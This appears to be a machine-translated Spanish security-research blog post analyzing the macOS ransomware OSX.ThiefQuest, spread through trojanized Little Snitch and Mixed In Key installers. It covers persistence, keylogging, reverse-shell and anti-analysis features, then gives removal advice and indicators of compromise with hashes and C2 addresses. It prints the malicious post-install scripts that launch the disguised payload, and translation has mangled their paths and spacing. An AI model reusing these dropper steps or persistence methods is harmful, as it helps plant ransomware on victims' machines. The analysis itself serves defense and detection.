El instalador también contenía un script posterior a la instalación, un script de shell que se ejecuta después de que se completa el proceso de instalación. Es normal que este tipo de instalador contenga secuencias de comandos previas a la instalación y / o posteriores a la instalación, para su preparación y limpieza, pero en este caso la secuencia de comandos se utilizó para cargar el malware y luego iniciar el instalador legítimo Little Snitch.

! / bin / sh
mkdir / Biblioteca / LittleSnitchd

mv / Users / Shared / Utils / patch / Library / LittleSnitchd / CrashReporter
rmdir / Usuarios / Compartido / Utilidades

chmod + x / Library / LittleSnitchd / CrashReporter

/ Library / LittleSnitchd / CrashReporter
abrir /Users/Shared/LittleSnitchInstaller.app &

El script mueve el patcharchivo a una ubicación que parece estar relacionada con LittleSnitch y le cambia el nombre CrashReporter. Como hay un proceso legítimo que forma parte de macOS llamado Crash Reporter, este nombre se combinará razonablemente bien si se ve en Activity Monitor. Luego se elimina de la /Users/Shared/carpeta y lanza la nueva copia. Finalmente, lanza el instalador de Little Snitch.

En la práctica, esto no funcionó muy bien. El malware se instaló, pero el intento de ejecutar el instalador de Little Snitch se suspendió indefinidamente, hasta que finalmente lo forcé a cerrar. Además, el malware en realidad no comenzó a encriptar nada, a pesar del hecho de que lo dejé correr por un tiempo con algunos documentos señuelo en posición de víctimas voluntarias.

Mientras esperaba que el malware hiciera algo (¡cualquier cosa!), Una investigación adicional encontró un instalador malicioso adicional, para un software de DJ llamado Mixed In Key 8, así como insinúa que también existe un instalador malicioso de Ableton Live (aunque dicho instalador no aún se ha encontrado). Indudablemente, también hay otros instaladores flotando que no se han visto.

El instalador Mixed In Key resultó ser bastante similar, aunque con nombres de archivo ligeramente diferentes y script posterior a la instalación.

! / bin / sh
mkdir / Library / mixednkey

mv / Aplicaciones / Utilidades / patch / Library / mixednkey / toolroomd
rmdir / Aplicación / Utilidades

chmod + x / Library / mixednkey / toolroomd

/ Library / mixednkey / toolroomd &

Este no incluía código para iniciar un instalador legítimo, y simplemente dejó caer la aplicación Mixed In Key directamente en la carpeta Aplicaciones.

Infección

Una vez que el instalador desencadenó la infección, el malware comenzó a extenderse generosamente por el disco duro. Ambas variantes instalaron copias del patcharchivo en las siguientes ubicaciones:

/Library/AppQuest/com.apple.questd
/Users/user/Library/AppQuest/com.apple.questd
/private/var/root/Library/AppQuest/com.apple.questd

También configuró la persistencia a través del agente de lanzamiento y los archivos de daemon plist:

/Library/LaunchDaemons/com.apple.questd.plist
/Users/user/Library/LaunchAgents/com.apple.questd.plist
/private/var/root/Library/LaunchAgents/com.apple.questd.plist

/private/var/root/Es probable que este último en cada grupo de archivos, encontrado en , se deba a un error en el código que crea los archivos en la carpeta del usuario, lo que lleva a la creación de los archivos en la carpeta del usuario raíz. Como es bastante raro que alguien inicie sesión como root, esto no tiene ningún propósito práctico.

Curiosamente, el malware también se copió en los siguientes archivos:

/Users/user/Library/.ak5t3o0X2
/private/var/root/Library/.5tAxR3H3Y

Este último era idéntico al patcharchivo original , pero el primero fue modificado de una manera muy extraña. Contenía una copia del patcharchivo, con una segunda copia de los datos de ese archivo adjunta hasta el final, seguida de 9 bytes adicionales: la cadena hexadecimal 03705701 00CEFAAD DE. Todavía no se sabe cuál es el propósito de estos archivos o estos datos adicionales agregados.

Aún más extraño, y aún inexplicable, fue el hecho de que el malware también modificó los siguientes archivos:

/Users/user/Library/Google/GoogleSoftwareUpdate/GoogleSoftwareUpdate.bundle/Contents/Helpers/crashpad_handler
/Users/user/Library/Google/GoogleSoftwareUpdate/GoogleSoftwareUpdate.bundle/Contents/Helpers/GoogleSoftwareUpdateDaemon
/Users/user/Library/Google/GoogleSoftwareUpdate/GoogleSoftwareUpdate.bundle/Contents/Helpers/ksadmin
/Users/user/Library/Google/GoogleSoftwareUpdate/GoogleSoftwareUpdate.bundle/Contents/Helpers/ksdiagnostics
/Users/user/Library/Google/GoogleSoftwareUpdate/GoogleSoftwareUpdate.bundle/Contents/Helpers/ksfetch
/Users/user/Library/Google/GoogleSoftwareUpdate/GoogleSoftwareUpdate.bundle/Contents/Helpers/ksinstall

Todos estos archivos son archivos ejecutables que forman parte de GoogleSoftwareUpdate, que se encuentran comúnmente instalados debido a que Google Chrome está instalado en la máquina. Estos archivos tenían el contenido del patcharchivo antepuesto a ellos, lo que, por supuesto, significaría que el código malicioso se ejecutaría cuando se ejecute cualquiera de estos archivos. Sin embargo, Chrome verá que los archivos se han modificado y reemplazará los archivos modificados con copias limpias tan pronto como se ejecute, por lo que no está claro cuál es el propósito aquí.

Comportamiento

El malware instalado a través del instalador Mixed In Key fue igualmente reticente para comenzar a cifrar archivos por mí. Lo dejé funcionando en una máquina real durante algún tiempo sin resultados, luego comencé a jugar con el reloj del sistema. Después de adelantarlo tres días, desconectarse de la red y reiniciar la computadora un par de veces, finalmente comenzó a cifrar archivos.

Sin embargo, el malware no era particularmente inteligente sobre qué archivos cifraba. Parecía cifrar varios archivos de configuración y otros archivos de datos, como los archivos de llavero. Esto dio como resultado un mensaje de error al iniciar sesión después del cifrado.

Hubo otras indicaciones de error muy obvias, como el Dock restableciendo su apariencia predeterminada.

El Finder también comenzó a mostrar signos de problemas, con bolas de playa giratorias que aparecían con frecuencia al seleccionar un archivo encriptado. Otras aplicaciones también se congelarían periódicamente, pero las congelaciones del Finder solo se podrían administrar forzando el cierre del Finder.

Aunque otros han informado que se crea un archivo con instrucciones sobre cómo pagar el rescate, así como una alerta que se muestra, e incluso texto a voz utilizado para informar al usuario que han sido infectados con ransomware, no pude duplicar ninguno de estos , a pesar de esperar bastante tiempo para que termine el ransomware.

Capacidades

El malware incluye algunas técnicas anti-análisis, que se encuentran en funciones nombradas is_debuggingy is_virtual_mchn. Esto es común con el malware, ya que tener un depurador conectado al proceso o ejecutarse dentro de una máquina virtual son indicios de que un investigador de malware lo está analizando. En tales casos, el malware normalmente no mostrará todas sus capacidades.

En una publicación de blog sobre Objective-See , Patrick Wardle describió los detalles de cómo funcionan estas dos rutinas. La is_virtual_mchnfunción en realidad no parece verificar si el malware se está ejecutando en una máquina virtual, sino que trata de atrapar una VM en el proceso de ajuste del tiempo. No es inusual que el malware incluya demoras. Por ejemplo, el primer ransomware Mac, KeRanger, incluyó un retraso de tres días entre el momento en que infectó el sistema y el momento en que comenzó a cifrar archivos. Esto ayuda a ocultar la fuente del malware, ya que el comportamiento malicioso puede no estar inmediatamente asociado con un programa instalado tres días antes.

Esto, más el hecho de que el malware incluye funciones con nombres como ei_timer_create, ei_timer_starty ei_timer_check, probablemente significa que el malware se ejecuta con un retraso de tiempo, aunque aún no se sabe cuál es ese retraso.

Patrick también señala que el malware parece incluir un keylogger, debido a la presencia de llamadas a CGEventTapCreate, que es una rutina del sistema que permite el monitoreo de eventos como pulsaciones de teclas. No se sabe qué hace el malware con esta capacidad. También abre un shell inverso a un servidor de comando y control (C2).

Preguntas abiertas

Todavía hay una serie de preguntas abiertas que serán respondidas a través de un análisis más detallado. Por ejemplo, ¿qué tipo de cifrado utiliza este malware? ¿Es seguro o será fácil de descifrar (como en el caso de descifrar archivos cifrados por el ransomware FindZip )? ¿Será reversible o la clave de cifrado nunca se comunicará a los delincuentes detrás de ella (también como FindZip)?

Todavía hay más por aprender, y actualizaremos esta publicación a medida que se conozca más.

Post-infección

Si se infecta con este malware, querrá deshacerse de él lo más rápido posible. Malwarebytes para Mac detectará este malware como OSX.ThiefQuest y lo eliminará.

Si sus archivos se cifran, no estamos seguros de cuán grave es la situación. Depende del cifrado y de cómo se manejan las claves. Es posible que una mayor investigación conduzca a un método para descifrar archivos, y también es posible que eso no suceda.

La mejor manera de evitar las consecuencias del ransomware es mantener un buen conjunto de copias de seguridad. Guarde al menos dos copias de seguridad de todos los datos importantes, y al menos una no debe mantenerse adjunta a su Mac en todo momento. (El ransomware puede intentar cifrar o dañar las copias de seguridad en las unidades conectadas).

Personalmente tengo varios discos duros para copias de seguridad. Utilizo Time Machine para mantener un par y Carbon Copy Cloner para mantener un par más. Una de las copias de seguridad siempre está en la caja de seguridad del banco, y las cambio periódicamente, por lo que, en el peor de los casos, siempre tengo datos razonablemente recientes almacenados en un lugar seguro.

Si tiene buenas copias de seguridad, el ransomware no es una amenaza para usted. En el peor de los casos, simplemente puede borrar el disco duro y restaurar desde una copia de seguridad limpia. Además, esas copias de seguridad también lo protegen contra cosas como fallas en la unidad, robo, destrucción de su dispositivo, etc.

Indicadores de compromiso

Archivos

parche (y com.apple.questd)
5a024ffabefa6082031dccdb1e74a7fec9f60f257cd0b1ab0f698ba2a5baca6b

Little Snitch 4.5.2.dmg
f8d91b8798bd9d5d348beab33604a540e13ce40b88adc096c8f1b3311187e6fa

Mezclado en clave 8.dmg
b34738e181a6119f23e930476ae949fc0c7c4ded6efa003019fa946c4e5b287a

Red

Servidor C2 167.71.237.219
Dirección C2 obtenida de andrewka6.pythonanywhere [.] Com